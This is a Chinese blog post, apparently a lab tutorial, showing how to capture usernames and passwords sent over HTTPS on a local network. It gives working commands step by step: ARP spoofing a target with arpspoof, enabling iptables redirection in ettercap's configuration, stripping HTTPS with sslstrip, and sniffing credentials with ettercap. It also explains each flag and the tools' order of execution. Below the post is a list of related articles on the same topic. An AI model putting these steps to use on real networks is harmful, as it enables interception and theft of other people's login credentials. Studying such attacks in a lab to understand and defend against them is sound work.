抓取https协议的用户名与密码

已于 2023-12-16 16:48:13 修改
阅读量158 收藏 3
点赞数
文章标签: 网络安全
于 2023-12-16 16:42:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liushaojiax/article/details/135034232
版权

1、首先安装sslstrip

命令执行:apt-get install sslstrip

如果遇到这个问题如下图

使用命令打开对应更新源文件:vim /etc/apt/sources.list

添加下面源地址:

#阿里云Kali镜像源

deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

#中科大Kali镜像源

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#清华大学Kali镜像源

deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

#kali源

deb http://http.kali.org/kali kali-rolling main contrib non-free

deb-src http://http.kali.org/kali kali-rolling main contrib non-free

注意:如果出现没有数字签名问题,那就是需要下载证书

使用命令:

wget archive.kali.org/archive-key.asc            #下载证书

apt-key add archive-key.asc                          #添加证书

然后再apt-get update命令完成更新再执行apt-get install sslstrip

2、启动arp欺骗

arpspoof -i ech0 -t 192.168.159.148 192.168.159.2

arpspoof -i ech0(网卡)  -t  目标机ip  本地局域网关

3、命令行输入: vim  /etc/ettercap/etter.conf进入配置文件

     找到下红框的内容,输入字母i进入编辑模式,把#注释符去掉,按键盘右上角ESC键退出编辑模式,进入命令行模式,同时按住shift键与冒号键:然后输入wq进行保存并退出。

 4、另外再启动第二kali终端,输入下面命令

命令执行:sslstrip -a -f –k

sslstrip是一个命令行工具,用于将HTTPS连接转换为HTTP连接,以便进行中间人攻击。其中

-a选项表示将所有请求重定向到攻击者控制的设备上

-f选项表示强制使用HTTP而不是HTTPS

-k选项表示忽略证书错误。

因此,这个命令的作用是在中间人攻击中使用sslstrip工具将HTTPS连接转换为HTTP连接,并将所有请求重定向到攻击者控制的设备上,同时忽略证书错误。

5、另起第三个Kali终端输入:ettercap -Tq -i eth0

-T:启动文本模式  q:安静模式  -i:攻击机网卡

 6、Win7访问https协议网站后台

注意:使用google浏览器 ,不要使用用IE浏览器(默认开启了HSTS(HTTP Strict Transport Security--HTTP严格传输安全)功能,该功能会强制浏览器只能通过HTTPS协议访问原本就是HTTPS协议编写的网站)

访问https协议网站:登录实验吧

  6.1、直接访问出现不安全连接界面,点击“高级”

6.2、点击“继续前往”

 6.3、进入登入后台,随机输入账号密码

6.4、回到kali虚拟机,查看ettercap工具的抓取结果

 最后抓到账户和密码

总结:

抓取https协议的用户名和密码,使用arpspoof、sslstrip和ettercap这三个工具他们的关系与执行顺序是什么样的。

它们之间的关系如下:

1、arpspoof:用于欺骗目标机器,使其将流量发送到攻击者的机器上。

2、sslstrip:用于将https流量转换为http流量,以便于进行嗅探。

3、ettercap:用于嗅探流量并提取用户名和密码等信息。

执行的顺序如下:

1、使用arpspoof欺骗目标机器,使其将流量发送到攻击者的机器上。

2、在攻击者的机器上运行sslstrip,将https流量转换为http流量。

3、使用ettercap嗅探流量并提取用户名和密码等信息。

拓展:ettercap.conf配置文件取消注释的语句解释。

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp -d %destination --dport %port - j REDTRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp -d %destination --dport %port -j REDIRECT --to-port %rport" 分别是什么意思

redir_command_on和redir_command_off是用于开启和关闭iptables端口转发的命令。其中,iptables是一个Linux系统中用于管理网络连接的工具,可以通过它来设置网络连接的规则。具体来说,redir_command_on命令用于将来自指定端口的数据流量重定向到另一个IP地址和端口,而redir_command_off命令则用于关闭这个端口转发规则。

其中,redir_command_on命令中的参数含义如下:

- %iface:表示网络接口名称,即网络连接的设备名称。

- %destination:表示目标IP地址(受害者主机IP)。

- $port:表示源端口号。

- %rport:表示目标端口号。

redir_command_off命令中的参数含义与redir_command_on命令相同。

下面是两个具体的范例:

# 开启端口转发规则

redir_command_on = "iptables -t nat -A PREROUTING -i eth0 -p tcp -d 192.168.1.100 --dport 80 -j REDIRECT --to-port 8080"

其中,eth0是指要监听的网络接口;8080是指ettercap监听的端口号。这个命令的作用是将所有通过80端口的流量重定向到ettercap监听的端口上,以便ettercap可以捕获流量并分析其中的https账号和密码。

# 关闭端口转发规则

redir_command_off = "iptables -t nat -D PREROUTING -i eth0 -p tcp -d 192.168.1.100 --dport 80 -j REDIRECT --to-port 8080"

liushaojiax
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
kali-wireshark抓取客户端访问ftp的用户名密码-运维安全详细笔记
06-30
本文将详细介绍如何使用 kali-wireshark 抓取客户端访问 ftp 的用户名密码,旨在帮助读者了解 wireshark 的基本使用和 ftp 协议的工作原理。 一、FTP 协议简介 FTP(File Transfer Protocol,文件传输协议)是一...
HTTPS抓取密码实操
wutiangui的博客
05-26 371
d.利用ettercap进行https/http密码嗅探。arpspoof -t 目标 网关 -i 设备。ettercap -Tq -i 攻击机网络名。e.实验IE登录一个https网站。a.先编辑配置文件,开启以下四项。c.启动sslstrip。
利用sslstrip和ettercap突破ssl嗅探密码
gold0523的专栏
11-16 1643
本教程不是原创,是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具,配合ettercap进行arp欺骗,可以突破经过ssl加密的协议(如https等,一种被动使用https协议的会受到攻击),进行局域网arp嗅探获得口令等信息。本教程不涉及原理,只讲应用,我尽量迅速录完节省大家时间 仍然跟大家说声抱歉,因为个人原因最近比较惆怅,因此不爱说话,所以还是不录语音教
探秘SNI-Detecter:网络嗅探SSL/TLS协议解析的强大工具
最新发布
gitblog_00088的博客
04-05 383
探秘SNI-Detecter:网络嗅探SSL/TLS协议解析的强大工具 项目地址:https://gitcode.com/garsonbb/sni-detecter 项目简介 SNI-Detecter 是一个开源项目,它提供了一个命令行工具,用于检测和分析服务器名称指示(Server Name Indication, SNI)扩展在SSL/TLS连接中的使用情况。该项目由Garsonbb开发,旨...
使用wireshark对HTTPS解密
热门推荐
weixin_43977912的博客
03-11 2万+
最近需要解析HTTPS流量,所以对wireshark的HTTPS解密进行了实测。 使用wireshark解密https的方法 方法一: 1、在wireshark的首选项中的protocols的tls选项里添加服务器私钥文件。p12文件需要填写密码。 2、从整个会话开始前开始抓包。 3、https数据包自动解密为http格式的包。 方法二: 1、使用chrome浏览器浏览页面,在系统环境变量中设置SSLKEYLOGFILE=C:\ssl_key\sslog.log(可变),将对应的文件同时添加到的首选项中
HTTPS抓包引发的一系列思考
chen__an的博客
12-26 768
在渗透测试过程中,必不可少的操作就是使用BurpSuite、Fildder等抓包工具对应用程序的数据包进行拦截、观察和篡改。那么问题来了——对于使用HTTPS协议的站点,在BurpSuite中拦截到的数据包为何也是“明文传输”?如下图所示。 从大神那里获得解答: (1) BurpSuite能抓到HTTPS协议的“明文数据”是因为BurpSuite在本地浏览器安装了自己的证书,作为中间人的...
HTTPS网页账号密码嗅探
weixin_45511599的博客
10-13 1754
一:SSL原理 SSL的作用是为了传输一些敏感信息(比如凭证账号密码)提供安全可靠的保障,确保用户使用浏览器和服务器之间传输的数据是安全可信的 当我们访问HTTPS类型的网站,浏览器首先是向服务器发送HTTP层面的请求,并且附带证书验证,在得到双方证书有效后,两者开始SSL安全通信 二:实战 原理:使用SSLstrip攻击,让我们的kali充当中间人(代理服务器),一边负责和靶机win7之间进行http明文通信,kali能够截获明文数据。另一方面kali进行路由转发,和原本win7要连接的服务器进行正常的h
https账号密码获取
xiaotu0821的博客
04-05 1890
1.      arp欺骗2.      vim/etc/ettercap/etter.conf  将 #if you useiptables语句下面的两条语句的#号注释去掉3.      sslstrip  -a -f -k (利用sslstrip将https协议还原成http协议)4.      ettercap -Tq -i eth0...
arp欺骗,抓取web和ftp用户名密码-ettercap-运维安全详细笔记
06-30
本文将详细介绍arp欺骗攻击技术的原理和应用,使用ettercap软件实现arp欺骗攻击,抓取web网站和ftp服务器的用户名密码。通过实验案例,演示如何使用ettercap进行arp欺骗攻击,并抓取用户名密码。 arp欺骗攻击...
使用sshLooterC抓取SSH密码1
08-03
本文将详细介绍如何使用 sshLooterC 抓取 SSH 密码。 首先,需要安装必要的依赖项,包括 make、gcc、libcurl4-openssl-dev、libpam0g-dev 等。这些依赖项可以使用 apt install 命令安装。 接下来,需要编译 ...
用 WinPCAP 监听并分析 FTP 协议并记录 IP、用户名密码和登陆是否 成功
04-09
用 WinPCAP 监听并分析 FTP 协议并记录 IP、用户名密码和登陆是否 成功
TrueURL(真实下载地址嗅探器)
04-12
很多下载网址隐藏了真实的链接,这个小软件可以很方便的分析出真实下载地址
Httplook(HTTP嗅探器_捕捉HTTP通讯)v1.25.1中文特别版(附注册码)
07-30
HTTPLook 是一个 HTTP 的嗅探器,它能捕捉本机与其它任何主机的 HTTP 通讯(不是 HTTPS 哦 ),然后显示详细的 HTTP 操作(如 GET/POST)、访问资源的 URL 、字节数大小等,这个软件简单易用,不用对 Internet Explorer 做任何其它设置(有的软件通过在 IE 中设置代理来监控数据),也不需要其它任何软件的支持,是一款较为绿色的、轻量级的软件 安装说
FTP连接与密码明文抓取的实验内容(win2008).pdf
07-10
《FTP连接与密码明文抓取的实验详解》 FTP(File Transfer Protocol),即文件传输协议,是一种用于在网络上进行文件传输的标准协议。在Windows 2008环境下,FTP连接的建立以及密码的明文传输可能存在安全隐患。...
获取HTTPS账号密码
IndexCSDN的博客
11-06 2778
HTTPS账号密码获取: 先编辑下/etc/ettercap/etter.conf 命令:vim /etc/ettercap/etter.conf 找到 # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-p...
https传输过程嗅探
weixin_34195546的博客
12-06 1357
C1->浏览器告知服务器自身的信息 length = 165 a5 16 03 01 00 A0 01 00 00 9C 03 03 5E 1C 37 CD 40 [ ^ 7 @] B6 4A 9A 1A BC 43 85 2D 91 6E 24 D1 CB 98 D2 67 [ J C - n$ g] 30 7B B9 34 F6 34 14 5...
https原理以及fiddler截获https报文原理
baidu_30374343的博客
12-13 3135
https原理 简要理解: 1、客户端请求服务器 2、服务器返回一个ca证书,证书里面有服务器的非对称加密的公钥 3、ca证书也是非对称加密的,是ca机构用其私钥加密过的 4、客户端从受信任的ca证书列表中取出该机构证书的公钥,并对证书进行解密 5、客户端解密后就得到服务器的公钥 6、客户端随机生成一堆对称加密密钥,并用服务器的公钥进行加密,发给服务器,以后服务器和客户端双方就用这个对称密钥来...
是否可以嗅探 HTTPS URL?
allway2的博客
07-29 550
不过,我想知道,如果打开连接的计算机位于家庭网络上并且可以访问包括基于Unix的路由器操作系统的wifi路由器,是否有可能从这种连接中获取URL?理想情况下,URL敏感的站点会设置适当的引用策略以在敏感页面上完全禁用它,但许多(如果不是大多数)不这样做。您所说的URL位于HTTP标头中,这些标头与HTTP正文一样,位于TLS流中,这意味着它们是加密的。即使HTTPS对您正在访问的路径进行加密,如果您单击该站点中的超链接,该超链接会转到未加密的页面,则完整路径可能会在。...
http/https服务器安全:嗅探漏洞url路径
zzhongcy的专栏
08-19 6210
这里记录一下我知道的一些经常被黑客嗅探的路径。 1、有些可能是正常路径,比如:GET /robots.txt 2、有些是需要加入安全策略的路径,比如:GET /phpMyAdmin/index.php 这里只是提供参考,大家平时多多注意点吧。 request: "GET / HTTP/1.1", request: "GET /robots.txt HTTP/1.1", request: "POST /Admin16c882df/Login.php HTTP/1.1", request: "GE...
使用wireshark对网络上传输的用户名密码进行抓取分析
09-16
使用Wireshark对网络传输的用户名密码进行抓取分析是一种常见的网络安全测试方法。以下是实施此方法的一般步骤: 1. 确保计算机上已经安装了最新版本的Wireshark软件,并启动该软件。 2. 启动Wireshark后,选择...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值